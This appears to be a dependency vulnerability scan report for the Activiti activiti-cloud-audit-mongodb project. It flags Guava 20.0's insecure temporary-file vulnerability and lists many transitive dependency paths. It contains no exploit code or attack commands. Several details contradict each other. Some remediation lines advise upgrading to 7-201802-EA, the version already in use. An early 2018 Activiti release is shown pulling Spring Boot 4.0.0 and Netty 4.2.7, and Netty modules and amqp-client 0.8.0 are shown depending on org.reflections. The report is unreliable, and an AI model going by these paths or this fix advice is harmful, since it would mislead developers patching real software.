Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.boot:spring-boot-starter-webflux@4.0.0 › org.springframework.boot:spring-boot-starter-reactor-netty@4.0.0 › org.springframework.boot:spring-boot-reactor-netty@4.0.0 › io.projectreactor.netty:reactor-netty-http@1.3.0 › io.projectreactor.netty:reactor-netty-core@1.3.0 › io.netty:netty-handler-proxy@4.2.7.Final › io.netty:netty-codec-socks@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.boot:spring-boot-starter-webflux@4.0.0 › org.springframework.boot:spring-boot-starter-reactor-netty@4.0.0 › org.springframework.boot:spring-boot-reactor-netty@4.0.0 › io.projectreactor.netty:reactor-netty-http@1.3.0 › io.netty:netty-resolver-dns-native-macos@4.2.7.Final › io.netty:netty-resolver-dns-classes-macos@4.2.7.Final › io.netty:netty-resolver-dns@4.2.7.Final › io.netty:netty-codec-dns@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.boot:spring-boot-starter-webflux@4.0.0 › org.springframework.boot:spring-boot-starter-reactor-netty@4.0.0 › org.springframework.boot:spring-boot-reactor-netty@4.0.0 › io.projectreactor.netty:reactor-netty-http@1.3.0 › io.projectreactor.netty:reactor-netty-core@1.3.0 › io.netty:netty-resolver-dns-native-macos@4.2.7.Final › io.netty:netty-resolver-dns-classes-macos@4.2.7.Final › io.netty:netty-resolver-dns@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.boot:spring-boot-starter-webflux@4.0.0 › org.springframework.boot:spring-boot-starter-reactor-netty@4.0.0 › org.springframework.boot:spring-boot-reactor-netty@4.0.0 › io.projectreactor.netty:reactor-netty-http@1.3.0 › io.projectreactor.netty:reactor-netty-core@1.3.0 › io.netty:netty-resolver-dns-native-macos@4.2.7.Final › io.netty:netty-resolver-dns-classes-macos@4.2.7.Final › io.netty:netty-resolver-dns@4.2.7.Final › io.netty:netty-codec-dns@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
Overview
com.google.guava:guava is a set of core libraries that includes new collection types (such as multimap and multiset,immutable collections, a graph library, functional types, an in-memory cache and more.
Affected versions of this package are vulnerable to Creation of Temporary File in Directory with Insecure Permissions due to the use of Java's default temporary directory for file creation in FileBackedOutputStream. Other users and apps on the machine with access to the default Java temporary directory can access the files created by this class. This more fully addresses the underlying issue described in CVE-2020-8908, by deprecating the permissive temp file creation behavior.
NOTE: Even though the security vulnerability is fixed in version 32.0.0, the maintainers recommend using version 32.0.1, as version 32.0.0 breaks some functionality under Windows.
Remediation
Upgrade com.google.guava:guava to version 32.0.0-android, 32.0.0-jre or higher.
References
low severity
- Vulnerable module: com.google.guava:guava
- Introduced through: org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA
Detailed paths
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › io.springfox:springfox-core@2.8.0 › com.google.guava:guava@20.0
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › io.springfox:springfox-spring-web@2.8.0 › com.google.guava:guava@20.0
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › io.springfox:springfox-swagger2@2.8.0 › com.google.guava:guava@20.0
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › io.springfox:springfox-spi@2.8.0 › io.springfox:springfox-core@2.8.0 › com.google.guava:guava@20.0
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › io.springfox:springfox-spring-web@2.8.0 › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › io.springfox:springfox-swagger-ui@2.8.0 › io.springfox:springfox-spring-web@2.8.0 › com.google.guava:guava@20.0
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › io.springfox:springfox-swagger2@2.8.0 › io.springfox:springfox-spring-web@2.8.0 › com.google.guava:guava@20.0
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › io.springfox:springfox-swagger2@2.8.0 › io.springfox:springfox-swagger-common@2.8.0 › com.google.guava:guava@20.0
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › io.springfox:springfox-spring-web@2.8.0 › io.springfox:springfox-spi@2.8.0 › io.springfox:springfox-core@2.8.0 › com.google.guava:guava@20.0
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › io.springfox:springfox-swagger2@2.8.0 › io.springfox:springfox-spi@2.8.0 › io.springfox:springfox-core@2.8.0 › com.google.guava:guava@20.0
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › io.springfox:springfox-swagger2@2.8.0 › io.springfox:springfox-schema@2.8.0 › io.springfox:springfox-core@2.8.0 › com.google.guava:guava@20.0
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › io.springfox:springfox-swagger-ui@2.8.0 › io.springfox:springfox-spring-web@2.8.0 › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › io.springfox:springfox-swagger2@2.8.0 › io.springfox:springfox-spring-web@2.8.0 › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › io.springfox:springfox-swagger2@2.8.0 › io.springfox:springfox-swagger-common@2.8.0 › io.springfox:springfox-spring-web@2.8.0 › com.google.guava:guava@20.0
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › io.springfox:springfox-swagger-ui@2.8.0 › io.springfox:springfox-spring-web@2.8.0 › io.springfox:springfox-spi@2.8.0 › io.springfox:springfox-core@2.8.0 › com.google.guava:guava@20.0
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › io.springfox:springfox-swagger2@2.8.0 › io.springfox:springfox-spring-web@2.8.0 › io.springfox:springfox-spi@2.8.0 › io.springfox:springfox-core@2.8.0 › com.google.guava:guava@20.0
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › io.springfox:springfox-swagger2@2.8.0 › io.springfox:springfox-schema@2.8.0 › io.springfox:springfox-spi@2.8.0 › io.springfox:springfox-core@2.8.0 › com.google.guava:guava@20.0
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › io.springfox:springfox-swagger2@2.8.0 › io.springfox:springfox-swagger-common@2.8.0 › io.springfox:springfox-spi@2.8.0 › io.springfox:springfox-core@2.8.0 › com.google.guava:guava@20.0
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › io.springfox:springfox-swagger2@2.8.0 › io.springfox:springfox-swagger-common@2.8.0 › io.springfox:springfox-schema@2.8.0 › io.springfox:springfox-core@2.8.0 › com.google.guava:guava@20.0
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › io.springfox:springfox-swagger2@2.8.0 › io.springfox:springfox-swagger-common@2.8.0 › io.springfox:springfox-spring-web@2.8.0 › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › com.querydsl:querydsl-apt@4.1.4 › com.querydsl:querydsl-codegen@4.1.4 › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › com.querydsl:querydsl-apt@4.1.4 › com.querydsl:querydsl-codegen@4.1.4 › com.mysema.codegen:codegen@0.6.8 › com.google.guava:guava@20.0
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › com.netflix.netflix-commons:netflix-eventbus@0.3.0 › com.netflix.netflix-commons:netflix-infix@0.3.0 › com.google.guava:guava@20.0
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › com.netflix.netflix-commons:netflix-eventbus@0.3.0 › com.netflix.servo:servo-core@0.5.3 › com.google.guava:guava@20.0
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › io.springfox:springfox-swagger2@2.8.0 › io.springfox:springfox-swagger-common@2.8.0 › io.springfox:springfox-spring-web@2.8.0 › io.springfox:springfox-spi@2.8.0 › io.springfox:springfox-core@2.8.0 › com.google.guava:guava@20.0
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › io.springfox:springfox-swagger2@2.8.0 › io.springfox:springfox-swagger-common@2.8.0 › io.springfox:springfox-schema@2.8.0 › io.springfox:springfox-spi@2.8.0 › io.springfox:springfox-core@2.8.0 › com.google.guava:guava@20.0
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › org.springframework.cloud:spring-cloud-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › com.netflix.netflix-commons:netflix-eventbus@0.3.0 › com.netflix.netflix-commons:netflix-infix@0.3.0 › com.google.guava:guava@20.0
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › com.netflix.netflix-commons:netflix-eventbus@0.3.0 › com.netflix.netflix-commons:netflix-infix@0.3.0 › com.google.guava:guava@20.0
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › org.springframework.cloud:spring-cloud-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › com.netflix.netflix-commons:netflix-eventbus@0.3.0 › com.netflix.servo:servo-core@0.5.3 › com.google.guava:guava@20.0
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › com.netflix.netflix-commons:netflix-eventbus@0.3.0 › com.netflix.servo:servo-core@0.5.3 › com.google.guava:guava@20.0
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › org.springframework.cloud:spring-cloud-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › com.netflix.netflix-commons:netflix-eventbus@0.3.0 › com.netflix.netflix-commons:netflix-infix@0.3.0 › com.google.guava:guava@20.0
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › org.springframework.cloud:spring-cloud-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › com.netflix.netflix-commons:netflix-eventbus@0.3.0 › com.netflix.servo:servo-core@0.5.3 › com.google.guava:guava@20.0
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.integration:spring-integration-amqp@7.0.0 › org.springframework.amqp:spring-rabbitmq-client@4.0.0 › com.rabbitmq.client:amqp-client@0.8.0 › io.netty:netty-handler@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.integration:spring-integration-amqp@7.0.0 › org.springframework.amqp:spring-rabbitmq-client@4.0.0 › com.rabbitmq.client:amqp-client@0.8.0 › io.netty:netty-transport@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.integration:spring-integration-amqp@7.0.0 › org.springframework.amqp:spring-rabbitmq-client@4.0.0 › com.rabbitmq.client:amqp-client@0.8.0 › io.netty:netty-codec-http@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.integration:spring-integration-amqp@7.0.0 › org.springframework.amqp:spring-rabbitmq-client@4.0.0 › com.rabbitmq.client:amqp-client@0.8.0 › io.netty:netty-handler@4.2.7.Final › io.netty:netty-codec-base@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.integration:spring-integration-amqp@7.0.0 › org.springframework.amqp:spring-rabbitmq-client@4.0.0 › com.rabbitmq.client:amqp-client@0.8.0 › io.netty:netty-codec-http@4.2.7.Final › io.netty:netty-codec-base@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.integration:spring-integration-amqp@7.0.0 › org.springframework.amqp:spring-rabbitmq-client@4.0.0 › com.rabbitmq.client:amqp-client@0.8.0 › io.netty:netty-codec-http@4.2.7.Final › io.netty:netty-codec-compression@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.integration:spring-integration-amqp@7.0.0 › org.springframework.amqp:spring-rabbitmq-client@4.0.0 › com.rabbitmq.client:amqp-client@0.8.0 › io.netty:netty-codec-http@4.2.7.Final › io.netty:netty-handler@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.integration:spring-integration-amqp@7.0.0 › org.springframework.amqp:spring-rabbitmq-client@4.0.0 › com.rabbitmq.client:amqp-client@0.8.0 › io.netty:netty-handler@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.integration:spring-integration-amqp@7.0.0 › org.springframework.amqp:spring-rabbitmq-client@4.0.0 › com.rabbitmq.client:amqp-client@0.8.0 › io.netty:netty-handler@4.2.7.Final › io.netty:netty-transport@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.integration:spring-integration-amqp@7.0.0 › org.springframework.amqp:spring-rabbitmq-client@4.0.0 › com.rabbitmq.client:amqp-client@0.8.0 › io.netty:netty-codec-http@4.2.7.Final › io.netty:netty-transport@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.integration:spring-integration-amqp@7.0.0 › org.springframework.amqp:spring-rabbitmq-client@4.0.0 › com.rabbitmq.client:amqp-client@0.8.0 › io.netty:netty-transport-native-epoll@4.2.7.Final › io.netty:netty-transport@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.integration:spring-integration-amqp@7.0.0 › org.springframework.amqp:spring-rabbitmq-client@4.0.0 › com.rabbitmq.client:amqp-client@0.8.0 › io.netty:netty-transport-native-io_uring@4.2.7.Final › io.netty:netty-transport@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
